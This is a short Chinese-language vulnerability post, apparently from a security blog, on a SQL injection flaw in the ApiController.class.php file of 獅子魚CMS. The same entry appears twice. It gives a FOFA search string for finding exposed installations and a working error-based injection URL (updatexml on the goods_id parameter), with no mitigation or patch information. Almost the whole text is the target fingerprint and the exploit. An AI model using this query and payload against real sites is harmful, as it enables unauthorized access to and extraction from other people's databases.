# 獅子魚CMS ApiController.class.php SQL注入漏洞
==FOFA==
"/seller.php?s=/Public/login"
==Payload==
https://xxx.xxx.xx.xxx/index.php?s=api/goods_detail&goods_id=1%20and%20updatexml(1,concat(0x7e,md5(1),0x7e),1)
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END

# 獅子魚CMS ApiController.class.php SQL注入漏洞
==FOFA==
"/seller.php?s=/Public/login"
==Payload==
https://xxx.xxx.xx.xxx/index.php?s=api/goods_detail&goods_id=1%20and%20updatexml(1,concat(0x7e,md5(1),0x7e),1)
请登录后查看评论内容